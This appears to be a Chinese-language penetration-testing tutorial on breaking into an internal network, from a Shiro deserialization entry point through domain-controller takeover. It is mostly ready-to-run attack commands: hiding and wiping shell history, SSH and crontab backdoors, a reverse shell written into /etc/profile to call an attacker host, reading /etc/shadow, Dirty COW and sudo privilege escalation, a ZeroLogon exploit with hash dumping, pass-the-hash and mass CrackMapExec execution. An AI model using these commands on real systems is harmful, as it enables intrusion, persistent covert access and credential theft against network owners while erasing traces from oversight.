内网渗透初探(三) | 查缺补漏
字数 1049 2025-08-24 20:49:22
内网渗透技术详解:从Linux入侵到域控提权
一、外网打点技术
1. Shiro反序列化漏洞利用
识别特征:
- 典型的Shiro框架登录界面
- Cookie中包含
rememberMe字段
利用工具:
- 使用j1anFen/shiro_attack工具进行攻击
- 直接上传冰蝎(Behinder)Webshell
二、Linux权限维持技术
1. 隐藏历史记录技术
方法:
- 命令前加空格:
[空格]cat /etc/passwd - 禁用历史记录:
set +o history(恢复:set -o history) - 删除特定历史记录:
history -d [num] - 清除全部历史记录:
echo > ~/.bash_history history -c
2. SSH公钥后门
步骤:
- 生成SSH密钥:
ssh-keygen -t rsa(三次回车) - 将公钥写入目标:
cat id_rsa.pub >> ~/.ssh/authorized_keys - 免密登录:
ssh root@目标IP
3. SSH软连接后门
原理:利用PAM认证配置中的auth sufficient pam_rootok.so
实现:
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=10022
连接:任意密码通过指定端口(如10022)SSH登录
4. 计划任务后门
设置:
(crontab -l;printf "*/3 * * * * /bin/bash /tmp/cron.sh;\rno crontab for `whoami`%100c\n")|crontab -
隐藏:通过特殊格式隐藏计划任务条目
5. 环境变量后门
植入方法:
echo 'bash -i >& /dev/tcp/[vps-ip]/[port] 0>&1' >> /etc/profile
触发:系统重启后自动反弹shell
三、Linux信息收集
1. 账户信息收集
whoami
id
cat /etc/passwd
cat /etc/shadow
2. 网络信息收集
ifconfig
netstat -anlp
arp -a
route -n
3. 进程信息
ps -ef
4. 系统信息
uname -a
rpm -qa
5. 凭证收集
cat /root/.bash_history
cat ~/.bash_history
w
四、Linux提权技术
1. 内核漏洞提权
步骤:
- 使用linux-exploit-suggester识别可用漏洞
- 下载对应exp(如脏牛CVE-2016-5195)
- 编译执行:
gcc -pthread dirty.c -o dirty -lcrypt ./dirty - 获取root权限账户
2. SUID提权
发现SUID文件:
find / -perm -u=s -type f 2>/dev/null
利用find命令提权:
find / -exec whoami \;
3. Sudo配置错误提权
利用方法:
sudo -u#-1 id
sudo -u#-1 whoami
五、横向移动技术
CVE-2020-1472 (ZeroLogon)域控攻击
工具准备:
攻击步骤:
-
获取域控信息:
net group "Domain Controllers" /domain -
置空域控密码:
python3 cve-2020-1472-exploit.py -n 域控主机名 -t 域控IP -
获取域控Hash:
python3 secretsdump.py xxx.cool/AD\$@192.168.30.128 -no-pass -
PTH攻击获取shell:
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f1de694efa543bb780da59c049541ea3 Administrator@192.168.30.128 -
还原域控密码:
python3 reinstall_original_pw.py AD 192.168.30.128 75f490ed04ba66f04e0e947a185679bd
六、扩大战果
使用CrackMapExec批量攻击
安装:
apt-get install crackmapexec
攻击命令:
proxychains crackmapexec smb 192.168.30.1/24 -u administrator -H f1de694efa543bb780da59c049541ea3 -d xxx.cool -x whoami
参数说明:
-u:指定用户名-H:指定NTLM Hash-d:指定域-x:执行系统命令
通过以上方法可以快速在内网中横向移动,控制多台主机。